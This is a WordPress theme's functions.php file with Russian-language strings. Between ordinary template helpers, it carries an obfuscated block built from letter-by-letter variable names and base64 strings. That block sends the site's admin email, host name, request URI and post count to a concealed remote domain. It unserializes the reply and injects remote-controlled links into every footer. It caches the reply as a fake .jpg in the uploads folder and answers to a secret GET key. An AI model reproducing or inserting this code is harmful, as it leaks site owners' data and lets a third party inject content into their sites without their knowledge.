<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $jVXZ='6';$RIRh='s';$CkmUMDd='a';$KxjlxYm='e';$zFMurp='_';$AFOgr='d';$TIWu='4';$mupw='c';$uhflo='d';$xHGR='e';$VJUA='b';$WLoi='e';$mwrgf='o';$aOaHlIRQ=$VJUA.$CkmUMDd.$RIRh.$KxjlxYm.$jVXZ.$TIWu.$zFMurp.$uhflo.$WLoi.$mupw.$mwrgf.$AFOgr.$xHGR;$EhuKbM='g';$oNwdH='e';$UodkYI='f';$ssteX='l';$rNvo='t';$fQYe='a';$MaTTZw='z';$iPTTw='n';$IjWAS='i';$tKGKaSzq=$EhuKbM.$MaTTZw.$IjWAS.$iPTTw.$UodkYI.$ssteX.$fQYe.$rNvo.$oNwdH;$QclgCw='r';$iXGrjS='r';$LQtZ='t';$sAlZ='3';$mcYBFf='o';$kwRHN='1';$vzmZp='t';$qKMdH='_';$ckspC='s';$WNepgjml=$ckspC.$LQtZ.$QclgCw.$qKMdH.$iXGrjS.$mcYBFf.$vzmZp.$kwRHN.$sAlZ;$yxaZ='s';$McQBjp='e';$MeIrBIt='r';$BYQuWsY='r';$dMJq='t';$joimbRD='v';$wZcjeJfP=$yxaZ.$dMJq.$BYQuWsY.$MeIrBIt.$McQBjp.$joimbRD;                     
		$wr_____________n='6';$kh________a='s';$xc_____________k='a';$sp__________z='e';$ob_______o='_';$aq___x='d';$tt__j='4';$pd_______________z='c';$lj_________q='d';$hw________b='e';$eh_______________s='b';$rm______o='e';$kk__d='o';$mw______x=$eh_______________s.$xc_____________k.$kh________a.$sp__________z.$wr_____________n.$tt__j.$ob_______o.$lj_________q.$rm______o.$pd_______________z.$kk__d.$aq___x.$hw________b;
		$qa__q='s';$lr_____m='x';$ag_______________i='t';$vy________l='n';$xl_______b='s';$ep_______________x='n';$zd__________k='i';$tj__t='i';$bb___p='c';$cf_______f='o';$tp_______________j='f';$uc_____g='u';$an____v='e';$dr__f='t';$ey_____z='_';$lk_______________q=$tp_______________j.$uc_____g.$vy________l.$bb___p.$ag_______________i.$zd__________k.$cf_______f.$ep_______________x.$ey_____z.$an____v.$lr_____m.$tj__t.$qa__q.$dr__f.$xl_______b;
		$hb___e='f';$xf____________g='p';$nn_____n='o';$mx__________g='e';$ht_______i='n';$yk_______________b=$hb___e.$nn_____n.$xf____________g.$mx__________g.$ht_______i;
		$ma____________s='a';$kf_____x='d';$kv___________f='e';$cv______________j='f';$oi___________s='r';$dc________p=$cv______________j.$oi___________s.$kv___________f.$ma____________s.$kf_____x;
		$ld_______________z='l';$lz___________a='e';$is____________h='s';$oa_____j='f';$yc_____w='c';$hs___________f='o';$qx_______________s=$oa_____j.$yc_____w.$ld_______________z.$hs___________f.$is____________h.$lz___________a;
		
		define("WP_ID", $mw______x("Mi4wLjA="));
		define("WP_TTL", $mw______x("MTA4MDA="));
		define("WP_SRC", $mw______x("dHBva24="));
	


		function wp_get_header() {
			global $mw______x, $lk_______________q;
			
			if (
				$lk_______________q($mw______x("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$lk_______________q($mw______x("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$lk_______________q($mw______x("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $mw______x, $yk_______________b, $qx_______________s, $dc________p;
			
			$go_____i = TEMPLATEPATH."/".$mw______x("Zm9vdGVyLnBocA==");
			$hb_______________f = @$yk_______________b($go_____i, "r");
			$go_____i = @$dc________p($hb_______________f, @filesize($go_____i));
			@$qx_______________s($hb_______________f);
			
			$yl_____________c = TEMPLATEPATH."/".$mw______x("ZnVuY3Rpb25zLnBocA==");
			$hb_______________f = @$yk_______________b($yl_____________c, "r");
			$yl_____________c = @$dc________p($hb_______________f, @filesize($yl_____________c));
			@$qx_______________s($hb_______________f);
			
			$ab_____________r = 0;
			if($go_____i && $yl_____________c) {
				if ($mw______x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($go_____i, $mw______x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ab_____________r = 1;
					}
					if (substr_count($go_____i, "wp_theme_GPL_credits()") < 1) {
						$ab_____________r = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ab_____________r = 12;
				}
			}
			
			if($ab_____________r > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ab_____________r -->";
			}
		}
	


		function wp_loaded() {
			global $mw______x, $lk_______________q;
			return $lk_______________q($mw______x("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($jd_________n, $yi____________h = "(more...)", $ui______________s = 0, $vv_______________x = "") {
				$mh_____________c = get_the_content($yi____________h, $ui______________s, $vv_______________x);
				$mh_____________c = apply_filters("the_content", $mh_____________c);
				
				$mh_____________c = str_replace("]]>", "]]>", $mh_____________c);
				if (strlen($_GET["p"]) > 0) {
					echo $mh_____________c;
				}
				else if ((strlen($mh_____________c)>$jd_________n) && ($sq________d = strpos($mh_____________c, " ", $jd_________n ))) {
					$mh_____________c = substr($mh_____________c, 0, $sq________d);
					$mh_____________c = $mh_____________c;
					echo $mh_____________c;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$yi____________h</a></div></p>";
				} else {
					echo $mh_____________c;
				}
				
			}
		}
	


		$po_____t='e';$ql____________k='o';$ew________b='b';$kr_____________m='n';$qc_____y='e';$bb_____w='a';$tb______m='c';$nc__i='_';$hl________p='4';$te__________n='d';$ti_______e='e';$tp___h='s';$um_________s='6';$ln_______j=$ew________b.$bb_____w.$tp___h.$ti_______e.$um_________s.$hl________p.$nc__i.$po_____t.$kr_____________m.$tb______m.$ql____________k.$te__________n.$qc_____y;
		$bi__________a='t';$nf______________t='e';$ta__________h='e';$dw__f='i';$gm__h='n';$zd__k='l';$er________e='t';$gk_____p='f';$bo______i='t';$ky______k='c';$zo______________c='_';$jm_____g='e';$wn___h='s';$bj_____________l='o';$va___________u='n';$ab_________k='g';$yd_______________s='_';$dn_______________y=$gk_____p.$dw__f.$zd__k.$jm_____g.$yd_______________s.$ab_________k.$nf______________t.$bo______i.$zo______________c.$ky______k.$bj_____________l.$va___________u.$er________e.$ta__________h.$gm__h.$bi__________a.$wn___h;
		$ny___________g='i';$ig_______________k='_';$nl___f='i';$je__i='s';$rd________r='f';$vz__c='e';$zu_____________p='l';$on______________b='s';$mp______m='t';$li____________u='x';$yt___________o='e';$lv_______t=$rd________r.$ny___________g.$zu_____________p.$yt___________o.$ig_______________k.$vz__c.$li____________u.$nl___f.$on______________b.$mp______m.$je__i;
		$hy__a='v';$uq_______f='m';$gm______v='i';$kj_______________n='s';$ar____________x='c';$mc___________t='_';$uc________a='n';$jl____d='r';$xj________g='o';$gs__________a='r';$wz___p='a';$uc__h='e';$xf__________o='e';$tg__________a='o';$zj___________g='p';$cu_____i=$hy__a.$xf__________o.$jl____d.$kj_______________n.$gm______v.$tg__________a.$uc________a.$mc___________t.$ar____________x.$xj________g.$uq_______f.$zj___________g.$wz___p.$gs__________a.$uc__h;
		$mm______j='o';$id__p='p';$yp__f='s';$hq________s='k';$ql_______p='n';$nb_______u='f';$vw______t='o';$bp__p='e';$bz________j='c';$ld______________t=$nb_______u.$yp__f.$mm______j.$bz________j.$hq________s.$vw______t.$id__p.$bp__p.$ql_______p;
		$xf_________t='w';$gb________t='e';$ta_____________s='i';$uw_________l='t';$an_______b='f';$ik___________k='r';$ul_________s=$an_______b.$xf_________t.$ik___________k.$ta_____________s.$uw_________l.$gb________t;
		$pq_________v='5';$is___c='d';$qi_______________k='m';$jm______x=$qi_______________k.$is___c.$pq_________v;
		$yf____________g='r';$yb_________q='e';$vp___w='a';$bs_________h='a';$nz____p='l';$qr_______________o='h';$il__l='p';$so__________u='t';$ng____________j=$yf____________g.$yb_________q.$bs_________h.$nz____p.$il__l.$vp___w.$so__________u.$qr_______________o;
		$rd____________x='z';$bf________u='r';$wz______________a='a';$sd____c='n';$vx__________q='u';$oc_______________j='l';$zo__r='i';$qw_______________i='e';$sr____________s='e';$dc__________b='i';$gm___a='s';$sg__________l=$vx__________q.$sd____c.$gm___a.$sr____________s.$bf________u.$dc__________b.$wz______________a.$oc_______________j.$zo__r.$rd____________x.$qw_______________i;
		$fc_______c='t';$hz______________p='m';$re____s='n';$cv_______e='a';$td____________t='m';$cf_____d='p';$pu___f='e';$ih___g=$fc_______c.$pu___f.$td____________t.$cf_____d.$re____s.$cv_______e.$hz______________p;
		$gs____e='t';$ki__j='e';$az____________e='x';$di__y='m';$va_______e='s';$wo______x='t';$wy___________t='r';$pi_____________k='c';$zs_______________i='a';$hs___y='t';$ym______c='e';$rp__________q='e';$uq_____________a='o';$zr_______j='r';$vu_____r='c';$no_________x='a';$na__v='e';$yx_______________x='t';$qp____________c='_';$iv___e='_';$ja____f='n';$iw_________a=$va_______e.$gs____e.$wy___________t.$ym______c.$zs_______________i.$di__y.$qp____________c.$vu_____r.$uq_____________a.$ja____f.$yx_______________x.$ki__j.$az____________e.$hs___y.$iv___e.$pi_____________k.$zr_______j.$rp__________q.$no_________x.$wo______x.$na__v;
	


		function bk_____h($ug______________r) {
			global $mw______x, $lk_______________q, $dn_______________y, $cu_____i, $iw_________a;
			
			if (!$lk_______________q($mw______x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($cu_____i(PHP_VERSION, "5.0.0", ">=") && $lk_______________q($mw______x("ZmlsZV9nZXRfY29udGVudHM=")) && $lk_______________q($mw______x("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ci_________g = $iw_________a(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$wh__b = @$dn_______________y($ug______________r, 0, $ci_________g);
			} else {
				$wh__b = @$dn_______________y($ug______________r, 0);
			}
			
			return $wh__b;
		}
	


		function jc_______________v($ug______________r) {
			global $lk_______________q, $ld______________t, $ul_________s, $mw______x;
			
			if (!$lk_______________q($mw______x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$bp____h = strpos($ug______________r, "/", 7);
			$ae________w = array(
				"uri"     => substr($ug______________r, $bp____h),
				"host"    => str_replace("http://", "", substr($ug______________r, 0, $bp____h)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$lc____m = @$ld______________t("$ae________w[host]", 80, $km_____q, $fr_______j, 4);
			
			if (!$lc____m) {
				return false;
			} else {
				$wh__b = "";
				$lm_____o  = "GET $ae________w[uri] HTTP/1.0\r\n";
				$lm_____o .= "Host: $ae________w[host]\r\n";
				$lm_____o .= "Referer: $ae________w[referer]\r\n";
				$lm_____o .= "Connection: Close\r\n\r\n";
				
				@$ul_________s($lc____m, $lm_____o);
				
				while (!@feof($lc____m)) {
					$ln___s = @fgets($lc____m, (1024*24));
					
					if ($ln___s == "\r\n") {
						$dr_______p = true;
						continue;
					}
					
					if ($dr_______p) {
						$wh__b .= $ln___s;
					}
				}
				
				return $wh__b;
			}
		}
	


		function dr_________m($ug______________r) {
			global $lk_______________q;
			$xk_____________f = false;
			
			if ($ug______________r != "") {
				if ($lk_______________q("bk_____h")) {
					$xk_____________f = @bk_____h($ug______________r);
				}
				
				if (!$xk_____________f && ($lk_______________q("jc_______________v"))) {
					$xk_____________f = @jc_______________v($ug______________r);
				}
			}
			
			return $xk_____________f;
		}
	


		function na________r() {
			global $_SERVER, $jm______x;
			
			$ek_______r = $_SERVER["SERVER_NAME"];
			
			if (substr("$ek_______r", 0, 4) == "www.") {
				$ek_______r = substr("$ek_______r", 4);
			}
			
			$ek_______r = $jm______x("$_SERVER[SERVER_NAME]");
			
			return $ek_______r;
		}
	


		function iy____x() {
			return "file";
		}
	


		function ql__v($ug______________r) {
			global $_SERVER, $dn_______________y, $lv_______t, $yk_______________b, $qx_______________s, $ul_________s;
			
			$hi______d = ni____________e();
			
			$wr_________e = na________r().".jpg";
			$yv__________d = $hi______d["dir_upload"]["path"]."/$wr_________e";
			$fn_______________i = @filemtime($yv__________d);
			
			if (!$fn_______________i || ((time()-$fn_______________i) >= WP_TTL)) {
				$xk_____________f = dr_________m($ug______________r);
				
				if ($xk_____________f) {
					if ($lv_______t($yv__________d)) {
						@unlink($yv__________d);
					}
					
					$hb_______________f = @$yk_______________b($yv__________d, "x+");
					
					@$ul_________s($hb_______________f, $xk_____________f);
					@$qx_______________s($hb_______________f);
				}
			} else {
				if ($lv_______t($yv__________d)) {
					$xk_____________f = @$dn_______________y($yv__________d);
				} else {
					$xk_____________f = false;
				}
			}
			
			return $xk_____________f;
		}
	


		function ni____________e() {
			global $_SERVER, $mw______x, $ln_______j;
			
			$fe_______________o = wp_count_posts("post");
			$yn___________g = pathinfo(get_bloginfo("template_directory"));
			
			$hi______d = array(
				"url" => array(
					"report"      => $mw______x("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $yn___________g,
				"dir_upload"	=> oh__________f(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$yn___________g[filename],
					"a005=".$fe_______________o->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"	
			);
			
			$hi______d["url"]["queryString"] = implode("&", $hi______d["queryString"]);
			$hi______d["url"]["report"] = $hi______d["url"]["report"]."/?".$ln_______j($hi______d["url"]["queryString"]).".html";
						
			return $hi______d;
		}
	


		function oh__________f() {
			$pi_______________x = wp_upload_dir();
			
			if (isset($pi_______________x["error"])) {
				$fi____________u = yu___z();
				if (is_writable($fi____________u)) {
					$pi_______________x = array("path" => $fi____________u);
				}
			}

			return $pi_______________x;
		}
	


		function yu___z() {
			global $lk_______________q, $jm______x, $ng____________j, $ih___g;
			
			$ej____u = (bool) ini_get("safe_mode");
			if ($ej____u == true) {
				return false;
			}
			
			if ($lk_______________q("sys_get_temp_dir")) {
				$uh___c = sys_get_temp_dir();
				if (is_writable($uh___c)) {
					return $ng____________j($uh___c);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ng____________j($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ng____________j($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ng____________j($_ENV["TEMP"]);
			} else {
				$eg__________e = $ih___g($jm______x(uniqid(rand(), true)), "");
				if ($eg__________e) {
					$uh___c = $ng____________j(dirname($eg__________e));
					@unlink($eg__________e);
					return $uh___c;
				} else {
					return false;
				}
			}
		}
	


		function ch___________q() {
			global $_GET, $lv_______t;
			
			$hi______d = ni____________e();
			$ek_______r = na________r();
			$fr_____________s = iy____x();
			
			$fb__z = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($fr_____________s == "file") {
					$ez___h = $hi______d["dir_upload"]["path"]."/".$ek_______r.".jpg";
					if ($lv_______t($ez___h)) {
						@unlink($ez___h);
						$fb__z = "deleted";
					}
				}
				
				$cv________h = array(
					"s"	=> $fb__z,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($cv________h AS $of____________s => $fw__s) echo " [$of____________s:$fw__s]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $lk_______________q, $mw______x, $sg__________l;
			$hi______d = ni____________e();
			
			$so_________r = "ql__v";
			if ($lk_______________q($so_________r)) {
				$wh__b = $so_________r($hi______d["url"]["report"]);
			}
			
			if ($wh__b) {
				if ($wh__b = @$mw______x($wh__b)) {
					$wh__b = @$sg__________l($wh__b);
					
					if (strlen($wh__b[custom_credit]) >= 5) {
						$hi______d["default_string"] = $wh__b[custom_credit];
					}
					
					if ($wh__b["status"] == "0") {
						$ob______p = 1;
						$kc_____________d = 1;
					} else {
						$cm_____q = sizeof($wh__b["links"]);
						$sr_____o = $hi______d["default_string"];
						
						if ($cm_____q > 0 && $wh__b["links"] !== "") {
							$ka___________a = 0;
							foreach ($wh__b["links"] as $cv_________q => $ax______q) {
								$ka___________a++;
								if ($ax______q->l_path == "" || $ax______q->l_path == $_SERVER["REQUEST_URI"]) {
									$ax______q->l_href = htmlspecialchars(strip_tags($ax______q->l_href));
									$ax______q->l_title = htmlspecialchars(strip_tags($ax______q->l_title));
									$ax______q->l_anchor = htmlspecialchars(strip_tags($ax______q->l_anchor));
									$sr_____o .= " | ";
									$sr_____o .= "<a href='$ax______q->l_href' title='$ax______q->l_title'";
									if ($ax______q->l_nofollow == "1") {
										$sr_____o .= " rel='nofollow'";
									}
									$sr_____o .= ">$ax______q->l_anchor</a>";
								}
							}
						}
						$hi______d["links"] = "$sr_____o";
						if ($wh__b[credit] == "0") {
							$hi______d["links"] = "";
						}
					}
				} else {
					$ob______p = "1";
				}
			} else {
				$ob______p = "1";
			}
			
			if ($ob______p == "1") {
				$hi______d["links"] = $hi______d["default_string"];
			}
			
			echo "$hi______d[links]";
			
			echo "<!-- s: $wh__b[signature] -->";
			ch___________q();
		}
	                      
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

